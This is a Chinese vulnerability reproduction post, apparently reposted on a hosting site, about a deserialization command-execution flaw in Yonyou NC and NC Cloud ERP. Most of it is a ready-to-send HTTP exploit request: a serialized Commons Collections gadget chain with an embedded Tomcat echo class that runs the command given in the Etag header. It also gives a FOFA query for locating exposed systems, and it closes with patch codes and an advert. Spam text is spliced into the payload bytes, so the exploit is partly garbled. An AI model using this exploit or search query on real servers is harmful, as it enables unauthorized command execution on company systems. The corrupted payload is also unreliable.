0x01 产品简介
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
0x02 漏洞概述
用友NC及NC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
0x03 影响范围
NC56、NC57、NC63、NC65、NCC1903、NCC1909、NCC2005
0x04 复现环境
FOFA:body=”Client/Uclient/UClient.dmg”
0x05 漏洞复现
Exp:
POST /servlet/~ic/nc.bs.framework.mx.MxServlet HTTP/1.1
Host: your-ip
Etag: whoami
{{unquote("xacxedx00x05srx00x11java.util.HashSetxbaDx85x95x96xb8xb74x03x00x00xpwx0cx00x00x00x02?@x00x00x00x00x00x01srx004org.apache.commons.collections.keyvalue.TiedMapEntryx8axadxd2x9b9xc1x1fxdbx02x00x02Lx00x03keytx00x12Ljava/lang/Object;Lx00x03maptx00x0fLjava/util/Map;xptx00x04su18srx00*org.apache.commons.collections.map.LazyMapnxe5x94x82x9eyx10x94x03x00x01Lx00x07factorytx00,Lorg/apache/commons/collections/Transformer;xpsrx00:org.apache.commons.collections.functors.ChainedTransformer0xc7x97xecx28zx97x04x02x00x01[x00x0diTransformerstx00-[Lorg/apache/commons/collections/Transformer;xpurx00-[Lorg.apache.commons.collections.Transformer;xbdV*xf1xd84x18x99x02x00x00xpx00x00x00x06srx00;org.apache.commons.collections.functors.ConstantTransformerXvx90x11Ax02xb1x94x02x00x01Lx00x09iConstantqx00~x00x03xpvrx00*org.mozilla.javascript.DefiningClassLoaderx00x00x00x00x00x00x00x00x00x00x00xpsrx00:org.apache.commons.collections.functors.InvokerTransformerx87x服务器托管网e8xffkx7b|xce8x02x00x03[x00x05iArgstx00x13[Ljava/lang/Object;Lx00x0biMethodNametx00x12Ljava/lang/String;[x00x0biParamTypestx00x12[Ljava/lang/Class;xpurx00x13[Ljava.lang.Object;x90xceXx9fx10sx29lx02x00x00xpx00x00x00x01urx00x12[Ljava.lang.Class;xabx16xd7xaexcbxcdZx99x02x00x00xpx00x00x00x00tx00x0egetConstructoruqx00~x00x1ax00x00x00x01vqx00~x00x1asqx00~x00x13uqx00~x00x18x00x00x00x01uqx00~x00x18x00x00x00x00tx00x0bnewInstanceuqx00~x00x1ax00x00x00x01vqx00~x00x18sqx00~x00x13uqx00~x00x18x00x00x00x02tx00%org.apache.logging.util.crypt.NoCrypturx00x02[Bxacxf3x17xf8x06x08Txe0x02x00x00xpx00x00x0fxe2xcaxfexbaxbex00x00x002x00xe3x01x00%org/apache/logging/util/crypt/NoCryptx07x00x01x01x00x10java/lang/Objectx07x00x03x01x00x06x01x00x03x28x29Vx01x00x04Codex01x00x0fLineNumberTablex0cx00x05x00x06x0ax00x04x00x09x01x00x01qx01x003x28Ljava/lang/String;x29Ljava/io/ByteArrayOutputStream;x01x00x07execCmdx0cx00x0dx00x0cx0ax00x02x00x0ex01x00x08x01x00x1ejava/lang/NoSuchFieldExceptionx07x00x11x01x00x1fjava/lang/NoSuchMethodExceptionx07x00x13x01x00x13java/lang/Exceptionx07x00x15x01x00x15java/lang/ThreadGroupx07x00x17x01x00x15java/lang/ClassLoaderx07x00x19x01x00x17java/lang/reflect/Fieldx07x00x1bx01x00x13[Ljava/lang/Thread;x07x00x1dx01x00x10java/lang/Threadx07x00x1fx01x00x10java/lang/Stringx07x00!x01x00x0ejava/util/Listx07x00#x01x00x1djava/io/ByteArrayOutputStreamx07x00%x01x00x0dStackMapTablex01x00x0dcurrentThreadx01x00x14x28x29Ljava/lang/Thread;x0cx00x28x00x29x0ax00 x00*x01x00x0egetThreadGroupx01x00x19x28x29Ljava/lang/ThreadGroup;x0cx00,x00-x0ax00 x00.x01x00x15getContextClassLoaderx01x00x19x28x29Ljava/lang/ClassLoader;x0cx000x001x0ax00 x002x01x00x08getClassx01x00x13x28x29Ljava/lang/Class;x0cx004x005x0ax00x04x006x01x00x07threadsx08x008x01x00x0fjava/lang/Classx07x00:x01x00x10getDeclaredFieldx01x00-x28Ljava/lang/String;x29Ljava/lang/reflect/Field;x0cx00x01x00x0dsetAccessiblex01x00x04x28Zx29Vx0cx00@x00Ax0ax00x1cx00Bx01x00x03getx01x00&x28Ljava/lang/Object;x29Ljava/lang/Object;x0cx00Dx00Ex0ax00x1cx00Fx01x00x07getNamex01x00x14x28x29Ljava/lang/String;x0cx00Hx00Ix0ax00 x00Jx01x00x04execx08x00Lx01x00x08containsx01x00x1bx28Ljava/lang/CharSequence;x29Zx0cx00Nx00Ox0ax00"x00Px01x00x04httpx08x00Rx01x00x06targetx08x00Tx01x00x12java/lang/Runnablex07x00Vx01x00x06this$0x08x00Xx01x00x07handlerx08x00Zx01x00x0dgetSuperclassx0cx00x005x0ax00;x00]x01x00x06globalx08x00_x01x00x0aprocessorsx08x00ax01x00x04sizex01x00x03x28x29Ix0cx00cx00dx0bx00$x00ex01x00x15x28Ix29Ljava/lang/Object;x0cx00Dx00gx0bx00$x00hx01x00x03reqx08x00jx01x00x0bgetResponsex08x00lx01x00x09getMethodx01x00@x28Ljava/lang/String;[Ljava/lang/Class;x29Ljava/lang/reflect/Method;x0cx00nx00ox0ax00;x00px01x00x18java/lang/reflect/Methodx07x00rx01x00x06invokex01x009x28Ljava/lang/Object;[Ljava/lang/Object;x29Ljava/lang/Object;x0cx00tx00ux0ax00sx00vx01x00x09getHeaderx08x00xx01x00x0aCMD_HEADERx01x00x12Ljava/lang/String;x0cx00zx00x7bx09x00x02x00|x01x00x07isEmptyx01x00x03x28x29Zx0cx00~x00x7fx0ax00"x00x80x01x00x09setStatusx08x00x82x01x00x11java/lang/Integerx07x00x84x01x00x04TYPEx01x00x11Ljava/lang/Class;x0cx00x86x00x87x09x00x85x00x88x01x00x04x28Ix29Vx0cx00x05x00x8ax0ax00x85x00x8bx0cx00x0bx00x0cx0ax00x02x00x8dx01x00$org.apache.tomcat.util.buf.ByteChunkx08x00x8fx01x00x07forNamex01x00=x28Ljava/lang/String;ZLjava/lang/ClassLoader;x29Ljava/lang/Class;x0cx00x91x00x92x0ax00;x00x93x01x00x0bnewInstancex01x00x14x28x29Ljava/lang/Object;x0cx00x95x00x96x0ax00;x00x97x01x00x08setBytesx08x00x99x01x00x02[Bx07x00x9bx01x00x11getDeclaredMethodx0cx00x9dx00ox0ax00;x00x9ex01x00x0btoByteArrayx01x00x04x28x29[Bx0cx00xa0x00xa1x0ax00&x00xa2x01x00x07valueOfx01x00x16x28Ix29Ljava/lang/Integer;x0cx00xa4x00xa5x0ax00x85x00xa6x01x00x07doWritex08x00xa8x01x00x13java.nio.ByteBufferx08x00xaax01x00x04wrapx08x00xacx01x00x13[Ljava/lang/String;x07x00xaex01x00x13java/io/InputStreamx07x00xb0x01x00x07os.namex08x00xb2x01x00x10java/lang/Systemx07x00xb4x01x00x0bgetPropertyx01x00&x28Ljava/lang/String;x29Ljava/lang/String;x0cx00xb6x00xb7x0ax00xb5x00xb8x01x00x0btoLowerCasex0cx00xbax00Ix0ax00"x00xbbx01x00x03winx08x00xbdx01x00x03cmdx08x00xbfx01x00x02/cx08x00xc1x01x00x09/bin/bashx08x00xc3x01x00x02-cx08x00xc5x01x00x11java/lang/Runtimex07x00xc7x01x00x0agetRuntimex01x00x15x28x29Ljava/lang/Runtime;x0cx00xc9x00xcax0ax00xc8x00xcbx01x00x28x28[Ljava/lang/String;x29Ljava/lang/Process;x0cx00Lx00xcdx0ax00xc8x00xcex01x00x11java/lang/Processx07x00xd0x01x00x0egetInputStreamx01x00x17x28x29Ljava/io/InputStream;x0cx00xd2x00xd3x0ax00xd1x00xd4x0ax00&x00x09x01x00x05writex01x00x07x28[BIIx29Vx0cx00xd7x00xd8x0ax00&x00xd9x01x00x04readx01x00x05x28[Bx29Ix0cx00xdbx00xdcx0ax00xb1x00xddx01x00x0aSourceFilex01x00x0fTomcatEcho.javax01x00x04Etagx08x00xe1x00!x00x02x00x04x00x00x00x01x00x09x00zx00x7bx00x00x00x04x00x01x00x05x00x06x00x01x00x07x00x00x00x1dx00x01x00x01x00x00x00x05*xb7x00x0axb1x00x00x00x01x00x08x00x00x00x06x00x01x00x00x00x06x00x09x00x0bx00x0cx00x01x00x07x00x00x00x11x00x01x00x01x00x00x00x05*xb8x00x0fxb0x00x00x00x00x00x08x00x10x00x06x00x01x00x07x00x00x04xb4x00x08x00x11x00x00x02xbcx12xe2xb3x00x7dx03;xb8x00+xb6x00/Lxb8x00+xb6x003M+xb6x007x129xb6x00?N-x04xb6x00C-+xb6x00Gxc0x00x1exc0x00x1e:x04x036x05x15x05x19x04xbexa2x02~x19x04x15x052:x06x19x06xc7x00x06xa7x02ix19x06xb6x00K:x07x19x07x12Mxb6x00Qx9ax00x0dx19x07x12Sxb6x00Qx9ax00x06xa7x02Kx19x06xb6x007x12Uxb6x00?N-x04xb6x00C-x19x06xb6x00G:x08x19x08xc1x00Wx9ax00x06xa7x02x28x19x08xb6x007x12Yxb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007x12[xb6x00?Nxa7x00x16:x09x19x08xb6x007xb6x00^xb6x00^x12[xb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007xb6x00^x12`xb6x00?Nxa7x00x10:x09x19x08xb6x007x12`xb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007x12bxb6x00?N-x04xb6x00C-x19x08xb6x00Gxc0x00$xc0x00$:x09x036x0ax15x0ax19x09xb9x00fx01x00xa2x01~x19x09x15x0axb9x00ix02x00:x0bx19x0bxb6x007x12kxb6x00?N-服务器托管网x04xb6x00C-x19x0bxb6x00G:x0cx19x0cxb6x007x12mx03xbdx00;xb6x00qx19x0cx03xbdx00x04xb6x00w:x0dx19x0cxb6x007x12yx04xbdx00;Yx03x12"Sxb6x00qx19x0cx04xbdx00x04Yx03xb2x00x7dSxb6x00wxc0x00":x07x19x07xc6x01x09x19x07xb6x00x81x9ax01x01x19x0dxb6x007x12x83x04xbdx00;Yx03xb2x00x89Sxb6x00qx19x0dx04xbdx00x04Yx03xbbx00x85Yx11x00xc8xb7x00x8cSxb6x00wWx19x07xb8x00x8e:x0ex12x90x03,xb8x00x94:x0fx19x0fxb6x00x98:x08x19x0fx12x9ax06xbdx00;Yx03x12x9cSYx04xb2x00x89SYx05xb2x00x89Sxb6x00x9fx19x08x06xbdx00x04Yx03x19x0exb6x00xa3SYx04xbbx00x85Yx03xb7x00x8cSYx05x19x0exb6x00xa3xbexb8x00xa7Sxb6x00wWx19x0dxb6x007x12xa9x04xbdx00;Yx03x19x0fSxb6x00qx19x0dx04xbdx00x04Yx03x19x08Sxb6x00wWxa7x00S:x0fx12xabx03,xb8x00x94:x10x19x10x12xadx04xbdx00;Yx03x12x9cSxb6x00x9fx19x10x04xbdx00x04Yx03x19x0exb6x00xa3Sxb6x00w:x08x19x0dxb6x007x12xa9x04xbdx00;Yx03x19x10Sxb6x00qx19x0dx04xbdx00x04Yx03x19x08Sxb6x00wWx04;x1ax99x00x06xa7x00x09x84x0ax01xa7xfe|x1ax99x00x06xa7x00x0exa7x00x05:x06x84x05x01xa7xfdx80xa7x00x04Kxb1x00x08x00xa4x00xafx00xb2x00x12x00xd2x00xe0x00xe3x00x12x01xccx02Cx02Fx00x14x00x00x05x00x0cx00x07x00x0dx00x0ex00x0ex00x15x00x0fx00x1fx00x10x00$x00x11x001x00x12x00x02Cx00Cx02Fx00?x02Hx00@x02Qx00Ax02tx00Bx02x96x00Dx02x98x00Fx02x9fx000x02xa5x00Hx02xacx00Jx02xafx00Ix02xb1x00x12x02xb7x00Nx02xbax00Mx02xbbx00Ox00'x00x00x00xa6x00x15xffx004x00x06x01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x00x00xfcx00x16x07x00 xfcx00x1ax07x00"x02xfcx00"x07x00x04ex07x00x12x12]x07x00x12x0cxfdx00-x07x00$x01xffx01'x00x0fx01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x07x00 x07x00"x07x00x04x07x00$x01x07x00x04x07x00x04x07x00x04x07x00&x00x01x07x00x14xfcx00Ox07x00x04xf9x00x01x06xf8x00x05x06xffx00x02x00x06x01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x00x01x07x00x16xfcx00x01x07x00x04xfax00x05xffx00x02x00x00x00x01x07x00x16x00x00x09x00x0dx00x0cx00x01x00x07x00x00x00xe2x00x04x00x07x00x00x00x8c*x01xa5x00x0a*xb6x00x81x99x00x06xa7x00vx01Lx12xb3xb8x00xb9xb6x00xbcx12xbexb6x00Qx99x00x19x06xbdx00"Yx03x12xc0SYx04x12xc2SYx05*SLxa7x00x16x06xbdx00"Yx03x12xc4SYx04x12xc6SYx05*SLxb8x00xcc+xb6x00xcfxb6x00xd5Mxbbx00&Yxb7x00xd6Nx036x04x11x04x00xbcx08:x05xa7x00x0c-x19x05x03x15x04xb6x00xda,x19x05xb6x00xdeY6x04x02xa0xffxed-xb0xa7x00x08:x06xa7x00x03x01xb0x00x01x00x00x00x82x00x85x00x16x00x01x00'x00x00x00
PS:ysoserial的cc6+TomcatEcho回显链+yakit自带的strconv.Unquote 转化(反序列化数据)
0x06 修复建议
打对应补丁,重启服务,各版本补丁获取方式如下:
NC56方案
补丁名称:NC56mxservlet反序列化补丁
补丁编码:NCM_NC5.6_000_1008_20221215_GP__PGM_098441263
NC57方案
补丁名称:57mxservlet反序列化补丁
补丁编码:NCM_NC5.7_000_109902_20220412_GP__PGM_757354084
NC63方案
补丁名称:63mxservlet反序列化补丁
补丁编码:NCM_NC6.3_000_109902_20220412_GP__PGM_76074944
NC65方案
补丁名称:65mxservlet反序列化补丁
补丁编码:NCM_NC6.5_000_109902_20220412_GP__PGM_762735076
NCC1903方案
补丁名称:1903mxservlet反序列化补丁
补丁编码:
NCM_NCCLOUD1903_10_109902_20220412_GP__PGM_773746473
NCC1909方案
补丁名称:1909mxservlet反序列化补丁
补丁编码:
NCM_NCCLOUD1909_10_109902_20220412_GP__PGM_774732239
NCC2005方案
补丁名称:MxServlet反序列化命令执行
补丁编码:SUPPORT-NCCloud2020.05-Patch-20211102-299966
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
相关推荐: C++ Qt开发:SqlRelationalTable关联表组件
Qt 是一个跨平台C++图形界面开发库,利用Qt可以快速开发跨平台窗体应用程序,在Qt中我们可以通过拖拽的方式将不同组件放到指定的位置,实现图形化开发极大的方便了开发效率,本章将重点介绍SqlRelationalTable关联表组件的常用方法及灵活运用。 在上…